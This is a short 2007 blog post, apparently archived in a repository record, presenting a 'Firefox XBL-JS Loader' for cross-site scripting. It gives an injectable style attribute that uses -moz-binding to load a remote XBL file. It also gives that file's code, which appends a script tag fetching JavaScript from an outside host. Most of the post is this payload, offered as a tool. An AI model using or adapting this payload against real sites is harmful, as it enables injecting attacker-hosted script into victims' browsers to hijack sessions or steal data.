Martin Paul Eve
Published May 15, 2007 | Version v1 | https://doi.org/10.59348/2h3ng-xtv52

Firefox XBL-JS Loader v1.0

Creators

  • 1. ROR icon Queen Mary University of London

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.

The process works as follows:

  1. Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
  2. Browser loads XBL document.
  3. XBL document modifies DOM to include <script src="evil_script.js"/>.
  4. Browser loads and parses Javascript.

The required XBL document (STXSS_XBL.xml) is as follows:

{% highlight xml %}

//This is the STXSS XBL Loader //Edit this line to the URL of the STXSS Javascript var url = "http://www.your-site.com/STXSS_JS.js"; //Do not edit below this line var scr = document.createElement("script"); scr.setAttribute("src",url); var bodyElement = document.getElementsByTagName("html").item(0); bodyElement.appendChild(scr); {% endhighlight %}

Firefox XBL-JS Loader v1.0 was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.

Additional details

Description

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context. The process works as follows: Inject attributes as follows (different encodings may be necessary): . Browser loads XBL document.

Identifiers

UUID
db2f408d-dec8-468d-8747-622d37a59db6
GUID
https://doi.org/10.59348/2h3ng-xtv52
URL
https://eve.gd/2007/05/15/firefox-xbl-js-loader-v1-0

Dates

Issued
2007-05-15T15:55:58
Updated
2007-05-15T15:55:58